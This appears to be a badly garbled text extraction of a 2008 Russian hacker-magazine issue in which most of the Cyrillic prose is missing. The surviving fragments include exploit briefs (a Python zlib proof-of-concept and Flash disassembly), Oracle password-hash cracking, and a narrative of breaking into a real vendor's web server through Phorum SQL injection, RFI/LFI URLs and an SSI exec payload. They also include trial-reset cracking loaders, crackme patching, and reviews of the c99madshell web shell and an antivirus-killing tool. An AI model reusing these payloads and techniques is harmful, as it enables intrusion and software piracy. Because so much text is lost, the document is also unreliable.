Stub Resolver Cache Poisoning proof-ofconcept exploit: http://www.trusteer.
com/docs/Microsoft_Windows_
resolver_DNS_cache_poisoning.pdf.
,
Microsoft
: blogs.technet.
com/swi/archive/2008/04/09/ms08020how-predictable-is-the-dnstransaction-id.aspx.
,
Security Focus: www.securityfocus.
com/bid/28553/info.

>> Targets
NT-
(32
64 ).

>> Exploit
exploit
Amit Klein: www.
trusteer.com/docs/Microsoft_
Windows_resolver_DNS_cache_
poisoning.pdf.

>> Solution

DNS-
(, SMALL
HTTP),
DNS-
TCP-,
53UDP

Proof-of-concept exploit
x 05 /113/ 08

>>

zlib

DNS-.

02

Borland
InterBases

libc, KERNEL32.
DLL, .
(/Server 2008)
shell-,
, ,
,
InterBase ibserver.

>> Brief

>> Targets:

11 2008 Borland
InterBase,

. Oracle Corporation,
( )
Zhen
Hua Liu,
Redwood.

ibserver.exe,



.
,
( DVD).

( ),
.


,
shell-. XP SP2/Server SP1

DEP
return2libc (
DEP
). , ,
UNIX, Windows

Borland
Interbase 2007 SP2 (ibserver.exe
version 8.0.0.123).
, , , .

x 05 /113/ 08

>> Exploit

proof-of-concept exploit, shell-.
:
www.securityfocus.com/data/
vulnerabilities/exploits/28730.pl.

>> Solution

zlib.
Python,

,
. PyZlib_unflush,
Python2.5.2/Modules/zlibmodule.c.
(flush)
,

( ;

).



,
.
, .
,
.
. , ,

, ,

flush(). ,
Python-
,
, shell
Python-.


,
.
( )

.
?
.
,
Python

,
- .
www.securityfocus.
com/bid/28715.

>> Targets
Python 2.5.2,
.

>> Exploit
proof-of-concept
exploit www.securityfocus.
com/data/vulnerabilities/exploits/
28715.py, :

proof-of-concept exploit
compMsg =
zlib.compress(msg)
bad = -24
decompObj =
zlib.decompressobj()
decompObj.decompress
(compMsg)
decompObj.flush(bad)

>> Solution
,
SVN-
(bugs.python.org/issue2586). -

.

04

Adobe
Flash
Player




.
ibserver.exe,
.

Python

03


zlib

>> Brief
Justin Ferguson IOActive
Security Advisory 9

$1450 CANVAS Professional


exploit!

049

>>
>> Targets
Adobe Flash Player 8.0.34.0/8.0.35.0/9/9.0.115.0/9.0.28.0/9.0.31.0/9.0.45.0/
9.0.47.0/9.0.48.0 ( RedHat Enterprise Linux Desktop/RedHat
Enterprise Linux Extras/RedHat Enterprise Linux Supplementary server/
S.u.S.E. Linux 10.1 ppc/S.u.S.E. Linux 10.1 x86/S.u.S.E. Linux 10.1 x86-64/
S.u.S.E. Novell Linux Desktop 9/S.u.S.E. openSUSE 10.2/S.u.S.E. openSUSE
10.3 ).

>> Exploit
Proof-of-concept exploit Immunity CANVAS
Early Update Program. $1450 3 (
$730 ). : www.immunityinc.com/products-canvas.
shtml.

>> Solution
Flash Player 9.0.124.0,
,
, www.adobe.com/support/security/bulletins/
apsb08-11.html. , , . SceneCount
( , !), AVM- , . -
- ,
. (
)
.
SWF-

>> Brief
9 2008 Mark Dowd ISS X-Force, IBM,
wushi team509
Adobe Flash Player, Linux.
swf- (,
web- ). ,
Adobe Flash Player ! - , , Windows
Linux, swf-
DefineSceneAndFrameLabelData.
SceneCount, ,
. SceneCount
, ,
(, ) .
, ,
Adobe Flash Player ,
Linux. ( Flash
Player)
, Mark Dowd
, flash-,
- ActionScript
Virtual Machine (, , AVM). ,
-, , , -, .
- ,
exploit ,
Adobe Flash Player: x86, x86-64, PPC, etc.
Mark Dowd Application-Specific Attacks:
Leveraging the ActionScript Virtual Machine, : documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf.
Security Focus: www.securityfocus.
com/bid/28695.

050

Full disclose
Flash-player, (
), SWF/FLV-, ( 9),
Macromedia: download.macromedia.com/pub/flash/licensing/file_
format_specification_v9.pdf.
! pdf- , .
. -
Adobe Acrobat Reader , NAG-Screen
Agree
() Disagree ( :)).
SWF-
: , , , , etc. (
). DefineSceneAndFrameLabelData,
(Scene),
.
DefineSceneAndFrameLabelData . , Scenes.
SceneCount unsigned int32 (
), .
DefineSceneAndFrameLabelData
(tag ID 0x56),

//
SceneData
{

UI32 FrameOffset

String SceneName
}
FrameData
{

UI32 FrameNumber

String FrameLabel
x 05 /113/ 08

>>

; , SC < 0
.text:30087A72
push eax

; EAX := 0, SC < 0
.text:30087A73
mov ecx, esi
.text:30087A75
call sub_3004A766

;
.text:30087A7A
and [ebp+arg_0], 0
.text:30087A7E
cmp dword ptr [esi+4], 0
.text:30087A82
jle short loc_30087AFA

;

, pdf

}
//
DefineSceneAndFrameLabelData
{

RecordHeader Header

UI32 SceneCount

SceneData Scenes[SceneCount]

UI32 FrameCount

FrameData Frames[FrameCount]
}
flash-player , SceneCount Scenes:
Flash Player,

.text:30087A42
call SWF_GetEncodedInteger

; Scene Count
mov edi, [ebp+arg_0]
.text:30087A47
.text:30087A4A
mov [esi+4], eax

; EAX := Scene Count
mov ecx, [ebx+8]
.text:30087A4D

; ECX swf-
sub ecx, [ebx+4]
.text:30087A50

; ECX -
cmp eax, ecx
.text:30087A53

; ?(Scene Count > ECX)
jg loc_30087BB4
.text:30087A55

; <- , SC < 0
test eax, eax
.text:30087A5B

;
jz loc_30087B0E
.text:30087A5D

; <- , SC < 0
.text:30087A63
mov ecx, [edi+20h]
.text:30087A66
push 3
.text:30087A68
push 3
.text:30087A6A
push 0Ch

; nCount
.text:30087A6C
push eax
; nSize
.text:30087A6D
call mem_Calloc
x 05 /113/ 08

SceneCount ,
swf-.
JG, SceneCount
. SceneCount < 0, ( ),
, ;
SceneCount .
, , ! ,
!
... SceneCount mem_
Calloc(), .
,
mem_Calloc(), , 2 . , ,
, ,
, . , mem_Calloc()
. ,
. ( ):
,

.text:30087AFA
mov eax, [esi+4]

; SceneCount
.text:30087AFD
mov ecx, [esi]

; returned pointer
.text:30087AFF
lea eax, [eax+eax*2]

; EAX := EAX*3
.text:30087B02
lea eax, [ecx+eax*4]

; EAX := EAX*4 + pointer
.text:30087B05
mov ecx, [ebp+arg_8]

; ECX := FrameCounter ( FC)
.text:30087B08
sub ecx, [eax-0Ch]

; ECX := FC-*((SC-1)*12+pointer)
.text:30087B0B
mov [eax-4], ecx

; *(SC*12+pointer-4) = ECX
pointer, mem_Calloc(),
, : *(SeneCount*12-4) =
FrameCount-*((SceneCount-1)*12). ,
SceneCount FrameCount ,
, ,
. , . ?
: (0x80000000 |
((address + 4)/12)), ,
12 .
!
(, ). ,
, , , ,
,
. ,
, ! z

051

>>

sh2kerr

Login:

/ STEP@GAMELAND. RU/

Pasword:

Login:
Pasword:

Login:
Pasword:

Login:
Pasword:

Oracle,

, ,
Oracle. , ,
? ? ,
? , .
(DBA). , ,
DBA, ,
. , , , ,
, , , ssh-
. ? ,
. , .
1.
SQL- WEB-,
. , ,
, .
2. ,
( SELECT ANY DICTIONARY), DBA. , , DBA ,
.
3. ,
PL/SQL Injection ,
SELECT ANY DICTIONARY,
. , http://milw0rm.com/exploits/4995.

052

,
. Oracle, ,
, ?


Oracle
. . Oracle
11 dba_users.
SYS.USER$, DBA_USERS
(VIEW) ,
. , DBA_USERS.
, :

SQL> select username, password from DBA_USERS;


, Password ,
8 . ?


Oracle , Assessment
of the Oracle Password Hashing Algorithm Joshua Wright Carlos
x 05 /113/ 08

Login:

Login:

Pasword:

Pasword:
Login:

Login:

Pasword:

Pasword:

>>

DBA_USERS

Assessment of the Oracle Password Hashing Algorithm

Ci. Oracle.
: http://www.isg.rhul.ac.uk/~ccid/publications/
oracle_passwd.pdf.
Oracle
11G.
. :

SYS
test1, SYStest1;
,
SYSTEST1;
, ,
(0x00);
( ) DES CBC , 0x0123456789ABCDEF;
DESCBC,
.
,
.
1. (salt) , .

(rainbow tables),
.
2. ,
, 256 .
,
256-26=230 .
, UPPER()
. 164 ,
( ,
http://www.
petefinnigan.com/forum/yabb/YaBB.cgi?board=ora_sec;a
ction=display;num=1131556773). ,

Oracle ,
. .

x 05 /113/ 08

SQL> create user test01 identified by abc123_


$#;

dvd
User created.
SQL> create user test02 identified by 123abc#_
$;
create user test02 identified by 123abc#_$
*
ERROR at line 1:
ORA-00988: missing or invalid password(s)

SQL> create user test02 identified by _123abc;


create user test02 identified by _123abc
*
ERROR at line 1:
ORA-00911: invalid character
SQL> create user test02 identified by
abc123^*;
create user test02 identified by abc123^*
*
ERROR at line 1:
ORA-00922: missing or invalid option



,

Oracle.

warning
!

!
,
!

SQL> create user test02 identified by


"^*abc?";
User created.
, , ( ORA-00911: invalid character).
:
1. (26),
(10) _,#,$ (3), 39 .
2.
.

053

Login:

Login:

Login:

Login:

Pasword:

Pasword:

Pasword:

Pasword:

>>

orabf woorabf core 2 duo 2.4

3. ,

. ,
. :
, .
30-60 .

.

, (
).

,
, , 39 , .
8 26*39^7= 3.6 *10^12 .
(http://www.
red-database-security.com/whitepaper/oracle_passwords.html),
,
( core 2 duo 2.4
1.6
woraauthbf,
).
, 8
, 40 . , ,
. ,
,
(salt).
9 , .
, ,
.

Rainbow Tables
Oracle
(salt), , ,

(rainbow tables). (salt)
( , ,
), , rainbow tables
.
SYS SYSTEM,
(DBA).
Rainbow tables, ,
. , ,

Oracle.

054

Oracle Rainbow Tables


rainbow Oracle, , - ,
. ,
winrtgen, cain&abel.
, .
. :
Hash . oracle.
Min Len , 0.
Max Len ; 7.
Index (
). .
Chain Len .
, . 20000. 2400.
Chain Count , .
1 , 67018864,
,
. 1 .
.
N of Tables . , ,
,
. .
Charset , . Oracle 39 ,
.
Username . Oracle .
SYSTEM.
, .
, , (Success
probability) 44 , .
x 05 /113/ 08

Login:

Login:

Login:

Login:

Pasword:

Pasword:

Pasword:

Pasword:

>>

rainbow

-, 99
, .
8 (99,00) 12 (99,91).
( Benchmark) -
24 Intel Celeron 2.4.
1 : ,
.
, 25
, , (,
7).
?, .
, , ,
LM/NTLM/MD5 www.freerainbowtables.com.
. ,
. , . winrtgen,
,
tables.lst.
:
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#000.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#001.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#002.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#003.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#004.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#005.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#006.rt;
oracle_oracle#1-7_0_2400x67108864_
SYSTEM#007.rt;
x 05 /113/ 08

,

tables.lst winrtgen.
harset charset.
txt . , ,
. - charset.
txt ( oracle):
# charset configuration file for winrtgen v1.2
by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by
Zhu Shuanglei <shuanglei@hotmail.com>
byte
alpha
alpha-space
.
.
.
oracle
123456789_#$]

video
DVD ,


Oracle.

= []
= [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
= [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]

= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0

, .
, ,
winrtgen,
winrtgen1.exe winrtgen2.exe
(
tables.lst).

12
7 . SYSTEM .
2 3 ; , -

055

>>

winrtgen 7

, 4 . ,
?

!
7 . 8
Success Rate 99,00%,
64 (
).
, , , .
60 ,
! 8 ,
, ,
web-: http://dsecrg.ru.

Oracle 11g
Oracle 11.
11 ,
. , .
DBA_USERS,
.
Oracle Database 11g Enterprise Edition Release
11.1.0.6.0 Production
With the Partitioning, OLAP, Data Mining and Real
Application Testing options
SQL> select username, password from dba_users;
USERNAME
------------------MGMT_VIEW
SYS
SYSTEM
DBSNMP

PASSWORD
-----------------------

, , .
SUS.USER$ , ,
(DBA). SELECT ANY DICTIONARY
.
:
SQL> select user, password, spare4 from sys.user$;

056

0 SYS
77E6B621F3BB777A
19.02.08
0
0

1
0

3 15.10.07

1
0 DEFAULT_CONSUMER_GROUP

0
S:52D6AC184EDE6D952E94317CB1C9918D2766C34A23C476E460D
72BD03F2C
, .
77E6B621F3BB777A, Oracle 10g, . ,
. 20
sha-1 , 10 salt.
, .
-, -,
. -,
. , , .
, Oracle ,
, , - . ,
OC Windows LM/NTLM-. ,
, ,
14 ,
. Oracle : ,
, ,
. , ,
.
, LM/NTLM-:
,
( ,
). ,
passwd. ,
, PassWd.
,
(cain&abel),
THC-Orakel ( Oracle 11g),
. , SHA-1 . ,

Oracle. ,
. , , . z
x 05 /113/ 08


,
-.
,
,

, -
, .

-,

.
,
.

.
!
, - ,
.
$65 ,
, - ,
-.
, .

. .

.
: , ,
. 10
, , , . ,
, .
: .
, -

.
, ! ,
15 2008

www.mobilkinofest.ru. WAP- (wap.mtscity.ru),
.
, ,
www.mobilkinofest.ru,
-. .
, ,
,
.
, , , ,
.
? !
: .

>>

- ?
? !
Agnitum! -, Agnitum.com
.
, .
, ?
, , , , ,
.


: misterBlack, misterWhite ,
.
, . , - .

. , Anatoly
Skoblov, 2001-2004, .
HTML ( ).
aboutphone.info/phorum, PHP-
. ,
: Phorum
. 100%
meta-.
<meta name="PhorumVersion" content="3.4.3a" />
<meta name="PhorumDB" content="mysql" />
<meta name="PHPVersion" content="4.4.7" />

misterBlack:
. . , Outpost Firewall. ... ?, .
Agnitum.com, . agnitum.
ru, , FR... .
Polski , outpost.pl. ( ) Joomla 1.0.9. ,
, IP- agnitum.com outpost.pl , . ,
( seologs.com/ip-domains.html), , , , , ,
, . !
aboutphone.info ( , ).

058

.
. .
[Critical SQL-inj uriauth() Phorum<=3.4.7 ]
www.securityfocus.com/archive/1/360635
:http://localhost/
phorum347/list.php?f=1&phorum_uriauth=waraxe%2527%20AN
D%20mid(password,2,1)=3/*:foobar,
, . ! , ,
, ,
.
x 05 /113/ 08

>>
Hack-day
,
misterWhite, .

misterWhite:
!
- !
. , - RSS.
...
Agnitum? , !

misterBlack:
, , .
isterWhite SQL, ,
. , , :
ICQ-
misterBlack:
misterWhite: ,
,
misterWhite: phorum_
cookieauth.

misterWhite:
Phorum.
.
5 ,
,
.
3 ,
. , , ,
- .
.
Phorum,
.
uriauth()
(- waraxe).
, : ..if
there is empty $admin_session and not exists
COOKIE variable $phorum_cookieauth, then (and
only then) urldecoded $phorum_uriauth will
be exploded.. match : Before
testing user must be logged out ,
!
,
,
.
,
.
, 5
,
. .
, 5
.
. misterBlack

,
...

.


.
, www.plain-text.info.
,
( , ..) . misterWhite
.
, MySQL 4.0.
. ,
, File_Priv
false.

misterWhite:
. : Phorum
. ,
, .
.
$PHORUM[admin_url],
, misterBlack
.
! , ,
, . ,

/ .
,
- , .
.
.
misterBlack:
, !
http://aboutphone.info/phorum/control.
,
misterWhite .
misterWhitea , -
, . , .
, ,
, . , , , PHP 4.4.7 .

misterWhite:
unset()- (PHP <=
4.4.3, 5.1.4):
/phorum3.4.x//phorum/index.
php?PHORUM[settings_dir]=[RFI]?&1267903400=1&-1079377568=1
/phorum3.4.x/phorum/index.
php?PHORUM[f]=[LFI]&-1267903400=1&1079377568=1
/phorum3.4.x/download.php?PHORUM[fileid]=[LF
I]%00.txt&-1267903400=1&-1079377568=1
/phorum3.4.x/admin/index.
php?help=123&lang=[LFI]

info
phpPgAdmin

PostgreSQL
. : phppgadmin.
sourceforge.net.


PHP www.
suphp.org.
suPHP

Apache (mod_suphp)

.


PHP-
. suPHP

Apache suExec
.
suphp ,
mod_php 25 ,

suexec
( 36
).

,

: madnet.
name/tools/madss
, domainsdb.com
,
www.seologs.com
?
: http://search.
msn.com/results.
aspx?first=1&FORM=
PERE&q=ip%3A77.8
8.21.11

misterBlack:
misterBlack:
.
. x 05 /113/ 08

! , misterWhite
.php ,
.

059

>>

/etc/passwd

: ? (
).
www.aboutphone.info/phorum/download.php?1,57/
SS7.jpg.
.
:
$info=$HTTP_SERVER_VARS["QUERY_STRING"];
$file=basename($info);
$args=explode(",", basename(dirname($info)));
$fileid=(int)$args[1];
$filename="$AttachmentDir/$ForumTableName/$fileid".
strtolower(strrchr($file, "."));
$AttachmentDir .
: /attach_from_phorum.
, . $ForumTableName
.

ifconfig

ICQ-log
misterWhite:
misterWhite:
misterWhite:
misterWhite:
phorum/ph1/


-
)
http://aboutphone.info/attach_from_

,
ph1.
. .htaccess
, .
, SAFE_MODE=ON
/home/sites/home/users/skoblov/.
, ,
.
, phpinfo()
mod_include ( SSI ).
.htaccess , ,
, :

misterWhite:

.
, $ForumTableName , . ALTER
TABLE .
.

misterBlack:

. :

AddHandler server-parsed .txt


AddHandler server-parsed .html
, html- ExecCGI.
, !
test.txt
<!--#exec cmd="uname -a"-->
, :
Linux s1.agnitum.com 2.6.9-55.ELsmp #1 SMP Fri Apr 20
16:36:54 EDT 2007 x86_64
/skoblov.

.

misterWhite:
, - uid/guid.
, , uid/guid
. , , ,
, .
.

misterBlack:
phpinfo()

060

, Agnitum.com.

x 05 /113/ 08

>>

video

,
.

Web- Agnitum

Safemod OFF!

agnitum/agnitum. ,
,
MySQL, PostgreSQL.
PostgreSQL 7.4.17 on x86_64redhat-linux-gnu,
compiled by GCC gcc (GCC) 3.4.6 20060404 (Red
Hat 3.4.6-3)

misterWhite:
PostgreSQL .
, .

. information.schema,
mssql mysql5. , r57 cyberlordsSQL, misterBlacky.

misterBlack:
phpPgAdmin, .
, , , , .
, 2005/2006
. , .
, , , Softkey.ru.
, , , , .

open_basedir disable_
functions . , PHP, ???
.

Happy End!
misterWhite:
.
? ?
? , ,
? ,
300? ,
Agnitum ?
. , ,
. , - . . :). SQL Phorum
( )
.

misterBlack:

warning
!

! ,

!

dvd
,
,
.

, , , . , ,
, .
, ! :) z

misterWhite:
, :
;
/etc/init.d /etc/rc.d/
, ,
;
proftpd
, ;
, , , .
support

,
. display_error=OFF
.
x 05 /113/ 08

061

>>
_A1!3N

R
DE
A
LO

, ,
, ,
,
,
. ,
,
.
FindWindow-SendMessage, ,
. ,
.
.
- .
.

FindWindow-SendMessage
nagscreen, . Total
Commander. , .
,
, ,
. ,
. :
1.
2.

062

3.
4.

ASM, Win32 API.
Visual Studio,
Delphi-Builder.
, WinExec (
CreateProcess ,
). :
UINT WinExec(
LPCST lpCmdLine, // exe ,
UINT uCmdShow //
);
(
Sleep()). .
:
x 05 /113/ 08

>>
LOADER

HyperSnap ,

LOADER

LOADER
Digalo 2000 , 15

static CWnd* PASCAL FindWindow(


LPCTSTR lpszClassName,
//
LPCTSTR lpszWindowName
//
);
static CWnd* FindWindowEx(
//
HWND hwndParent,
HWND hwndChildAfter, //
LPCTSTR lpszClass, //
LPCTSTR lpszWindow //
. FindWindow
, FindWindowEx
, (Button, Edit, List, Panel . ..).
, , .
Visual Studio Tools Spy++ . Total
Commander Spy++.
, Window 000305CB
Total commander TNASTYNAGSCREEN, :
000305CB ( ),
Total commander ,
TNASTYNAGSCREEN
, , Total
Commander - .
Window 00010630 1 TPanel.

. GetWindowText.
int GetWindowText
(
HWND hWnd,
LPTSTR lpString,
int nMaxCount
);

//
//
//


. FindWindow
TNASTYNAGSCREEN; FindWindowEx x 05 /113/ 08

MathMagic Personal 3.6. ,

TNotebook,
NagPage; TPanel , , TPanel ( ).
:
, , ,
, , BM_CLICK Button (
). SendMessage BM_CLICK. HANDLE
.
LRESULT SendMessage(
HWND hWnd,

// ,
UINT Msg,
//
WPARAM wParam,

// ( )
LPARAM lParam // ( )
);
Total .
, .
:
hWnd = ::FindWindow("TTOTAL_CMD", NULL);
if(! hWnd)
,
Totala ( , Totala ). ,
. , ,
.
Hook, DLL API-. ,
15-20 . ,
Windows-Total Commandera
,
.
Spy++ Window Scanner
InqSoft. , , - (
). , ,

063

>>

R
DE
A
LO

LOADER

DER
LOA

Digalo 2000 DigaloRegister

Reflector Internet

.
.

DelTrialCounter-file
, . ,
, .
, (
trial- , ). MathMagic
Personal 3.6, 30 .
MathMagic Personal
3.6.INI Windows, ,
msnasec.dll \System32.
,
-.
:
1. (());
2. ;
3. ;
4. ;
5. .
1
Windows System . API-.
UINT GetSystemDirectory(
//
LPTSTR lpBuffer,

UINT uSize,
//
);
UINT GetWindowsDirectory(
//
LPTSTR lpBuffer,
windows
UINT uSize,
//
);
4 Total Commandera :).

R
DE
A
LO

MathMagic Personal 3.6. 30 uses

,
:
LONG RegOpenKeyEx(
HKEY hKey,
LPCTSTR lpSubKey,

DWORD ulOptions,
REGSAM samDesired,
PHKEY phkResult,
);

//
// = 0
//
//

. , hKey
: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_
MACHINE, HKEY_USERS.
LONG RegDeleteKey(
// , RegOpenKeyEx
HKEY hKey,
LPCTSTR lpSubKey // , RegOpenKeyEx
);
.
, RegDeleteKey ,
.
SHDeleteKey, .
,
()
. ,
Windows :).
Digalo 2000 Russian, .
, Digalo trial-.
.
Digalo Windows DigaloRegister.exe, Digalo
.
.
, :

DelTrialCounter-reg
. . -

064

1. ,
2. ( )
x 05 /113/ 08

>>
R
LOADE

WindowScanner

video
DVD ,


.

warning

, , Digalo . ,
. Diglio 2000
, (
) , ,
.

SetLocalTime

, -
, trial-. -
API-:
BOOL SetLocalTime(
const SYSTEMTIME* lpSystemTime
);
SYSTEMTIME
. SYSTEMTIME ,
. , , ,

.
. ,
.
.NET Reflector,
Freeware, , ,
is out of date do you want to
update automatically?. , . ,
:
1.
2. Reflector
3. ( Reflector
)
4.
5. ,

Reflector.exe.
x 05 /113/ 08

Combo
, , .

HyperSnap 6.
,
.
, .
, .
: trial-
Windows.
:
DWORD GetTempPath(
DWORD nBufferLength, //
MAX_PATH
LPTSTR lpBuffer // ,

);

!

!
,


!

dvd


.

Windows.
HyperSnap
.
, ,
, . :
1.
2.
3.
4.
5.
6.
7.

trial- (
). ,
--. ... :).
5.
, , ,
WM_ACTIVATE
SendMessage. ,

065

>>

Total

, Armadilo, SoftICE,
OllyDbg, IDA .



. ,
3D MAX, Nero 6.xx,
7x .
,
, , . ,
, , , , . .
MSDN, cracklab.ru, wasm.ru .
.
shareware- , . -

HyperSnap

066

LOA
DER

, trial-.
. ,
- (,
, ). , , . ,
, ,
. , , , , .
, .
, ,
. , ,
Assembler ( ASM,
, , ). VB.NET, ,
- .z

HyperSnap
x 05 /113/ 08

>>

C# A Z

.NET- , - . , Visual Basic/C# , hiew


-. , , crackme
.
.NET .

( ),
, p-
, ,
. , , . ,
, ,
!


, ,
.
1. Visual Studio 2008 Express.
MS, : Visual Basic, C#,
C++, ++ -.
W2K , Server 2003
(off-line install 894 .iso-): http://www.
microsoft.com/express/download/.
2. Mono 2.0 Beta for Windows. .NET
Novell, Linux Windows,
W2K, MS Framework. ,
( , ), , 71 :
http://www.go-mono.com/mono-downloads/download.html.
3. Standard ECMA-335/Common Language Infrastructure (CLI)/4th edition
(June 2006). , , -, ,

068

, 556 ( , pdf): www.ecma-international.org/publications/


standards/Ecma-335.htm. : www.ecma-international.
org/publications/files/ECMA-ST/Ecma-335.pdf.
4. CIL Instruction Set. - C# Online.NET free
encyclopedia , (
): http://en.csharp-online.net/CIL_Instruction_Set.
5. MSIL. Aquila (
WASM).
C#, ( ): www.wasm.ru/series.
php?sid=22.
6. Common Intermediate Language. CIL-
( .NET) Wikipedia
( ): ttp://en.wikipedia.org/wiki/
Common_Intermediate_Language.
7,8,9,10... .
DVD.

crackme
- .NET- !
, , , Microsoft
Visual Studio FAR + Colorer. IDE, , (
,
),
, .

.
x 05 /113/ 08

>>
crackme, C#,
. ,
. IDE , ,
.
n2k_crackme_01h.cs
//
using System;
class nezumi
//
{
static void Main()
{
// s
string s;


//
System.Console.Write("enter password:");
s = System.Console.ReadLine();

if (s == "nezumi") {
//
System.Console.WriteLine("hello, master!");
}
else {
System.Console.WriteLine("fuck you, hacker!");
}
}
}
IDE .NET- <F6>,
( csc.exe ,
):

$cl.exe /clr hello-clr.cpp


hello-clr.exe - RTL, -.
. , C# -
, .
, .


n2k_crackme_01h.exe HIEW,
<ENTER> , <F5>
, jmp _CorExeMain ;
mscoree.dll. , .
, jmp
.text,
, - .
hex-mode, ( !)
Unicode, , ,
. , ,
crackme
, .
HIEW , ++
hello-clr.exe. CorExeMain.
.NET , C#,
strcmp, gets, printf,
MSVCR90.DLL. P/Invoke, ,
,
-, . ,
, P/Invoke ! .NET-
.


$ csc.exe n2k_crackme_01h.cs
Mono csc.exe mcs/mcs.bat, , , n2k_crackme_01h.exe,
. ,
.
/CLR
CL.EXE ( /Ox
):

n2k_crackme_01h.exe IDA Pro , CIL- . - Java-. IDA


Pro , ,
,
(ECMA-335/Partition III/CIL Instruction Set).
, . Options Text
representation.
(Number of opcode bytes) . Line
prefixes , Function offsets,
Options, Comments

.NET hex-
x 05 /113/ 08

IDA Pro .NET

069

>>

Dotnet IL Editor IL- GUI-

Display auto comments


(,
CIL- ).
IDA Pro , ( ) . , , .
.
, Microsoft,
C:\WINDOWS\Microsoft.
NET\Framework\v2.0.50727\. ilasm.exe.
n2k_crackme_01h.exe.
, -, ,
, IDA Pro, (: ildasm.exe ,
View Show bytes).
.
( ,
). , : System.Console::
Write("enter password"), V_0 System.String::Equality(V_0,
"nezumi") . fuck off, hacker!,
brtrue.s IL_0031 (
2Dh 0Dh). .
,
brtrue.s IL_0031
nop ( 00h,
90h, x86). brtrue.s IL_0031 brFALSE.
s IL_0031.
, , . ECMA-335, ,
brfalse.s 2Ch , .


, HIEW? ?
, ? CIL- !

(), .
2Dh 0Dh 72h 2F 00h 00h 70h 28h ( , ? Ildasm
, IDA Pro , , :
). ,
, ,
, HIEW <F3>. 2Dh
2Ch, <F9> .

070

mdbg.exe

... ! ! ,
, , 123456
. ,
, ,
- !


,
. , .
-


mdbg.exe
help: , help
;
a[ttach]: .NET-;
b[reak]: ;
ca[tch]: (events),
;
conf[ig]: / ;
del[ete]: ;
de[tach]: .NET-;
g[o]: ;
n[ext]: Step Over;
o[ut]: Steps Out;
s[tep]: Step Into;
p[rint]: ;
q[uit]: ;
r[un]: ;
set: ;
setip: ;
sh[ow]: .
x 05 /113/ 08

>>

( ) .NET Microsoft
.NET-
ildasm.exe

. , ( ),
.
.
Microsoft Visual Studio ,
, , . ICorDebug-, .NET ( ,
..), API-.
.NET-, ,
ICorDebug Interface ,
() , Release-.
, ?!
!


.NET: , , ; ( Java, Visual Basic,
C++, C#, F#) -,
;
CLR: Common Language Runtime ( ) Microsoft .NET Framework,
;
CIL: Common Language Infrastructure , , ,
-;
MSIL: Microsoft Intermediate Language (
Microsoft) - .NET
Microsoft;
IL: Intermediate Language ( ) -
.NET , ECMA335.
x 05 /113/ 08

, .NET ( mdbg.
exe, m managed, )
pdb-.
? IDA Pro map-,
map2pdb - , .
, . ildasm.exe, ilasm.exe,
/pdb .
ildasm.exe ,
,
.
ildasm.exe ,
n2k_crackme_01h.exe (, ). File
Dump ( <CTRL-D>),
Dump options ( ) . , Dump IL
Code! OK (, cracked).

cracked.il cracked.res
. Cracked.il
, , brtrue.s IL_0031 brfalse.s IL_0031.
, .
:
$ilasm.exe cracked.il /pdb
cracked.exe cracked.pdb,
.
.
,
exe,
.
, $mdbg.exe cracked.exe
, Main (
). ?
, show
sh. :
sh, IL-
run cracked.exe

# cracked.exe
STOP: Breakpoint Hit

071

>>

.NET crackmes

Microsoft Visual Studio

IDA Pro .NET

ildasm.exe
.NET-, ++


# main
43: IL_0000: nop
#
[p#:0, t#:0] mdbg> sh
# "sh"
40
.maxstack 2
41
.locals init (string V_0, bool V_1)
43:*
IL_0000:
nop

#
44
IL_0001:
ldstr "enter password:"
45
IL_0006:
call
Console::Write(string)
[p#:0, t#:0] mdbg>

[mscorlib]System.


( help) .
. , , .
x86 .
cracked.il
IL_0020: stloc.1,
, System.String::op_Equality.
IL_0021: ldloc.1, V_1, -

072

IL_0022: brtrue.s IL_0031


IL_0031 ( ). . !
IL_0020: stloc.1,
55 cracked.il,
. mdbg.exe DVD
. - , , Dotnet IL Editor IL- GUI-, mdbg.exe - (
).
, . .NET-, .


, -
.NET-. ,
, . .
,
( ), (
) crackme, www.crackmes.de
( , .NET).
, ,
, ! z
x 05 /113/ 08

>>

x-tools
R0id

/ r0id@bk.ru /

: c99madshell
: Win/*nix
: madnet

c99shell
,
-. php, perl,
asp-. ,
. c99shell c99madshell.
- c99shell
, :


SQL-

PHP-
.htpasswd, config.
inc.php, suid, sgid, service.pwd,
bind_bash, .fetchmail, etc



SafeMode

(/
)
,
, :

(
, -

074

)

( ,
)
(
, 44 )
GET- ( POST-)

-
, (,
-
shell.php :)). , c99madshell
,

. , -
, .
: Vkontakte Search
: Win/*nix
: Hormold-


. ,

:
$id="";
// ID
$email="";
//
$password=md5("");//
$sex="1";
// , 1 ,
2 ( , ,
- :))
$city="1";
// ID
ID
:
49 , 60
61 , 72 ,
73 , 1 ,
87 , 95 ,
99 , 104 ,
110 , 119 --,
123 , 2 -
, ,

.
:

:)
-
. ,


.

, , , ,
. ,
.
Vkontakte Search. PHP

(, :)). -, ,

<?
error_reporting (E_ALL);
$file=file("log.txt");
for($i=0; $i < count($file); $i++){
list($id,$img,$nick,$rep)=explode(
":",$file[$i]);
echo "Id:$id($nick)<BR><IMG
SRC=img/".$id."_".$img."><BR>";
echo $file[$i];
}
echo count($file);
?>

,
, , ,
x 05 /113/ 08

>>
. ,
,
, , .
,
, .
: StopAV
:Windows XP
: Dr.Samuil


,
(),
.
, ,
Dr.Samuil ,
, StopAV.
Delphi
.
:
McAffee AntiVirus 7.1 Enterprise
6.0
AVZ 4.29
1.90
Kaspersky Internet Security 7.0
Panda Antivirus 2008 (3.00.00)
WinAntiVirus Pro 2007
Trend Micro OfficeScan 7.0
NOD32 AntiVirus 2.7


,
, :

.
/
. ,
,
,
,
.
DVD
.
x 05 /113/ 08

: Anti Keylogger Shield


: Windows 2000/XP
: Amic Tools



( , ),
.

.
:


(,
:)),
? ,
,
,
. Anti Keylogger Shield

, , ,
. , Anti
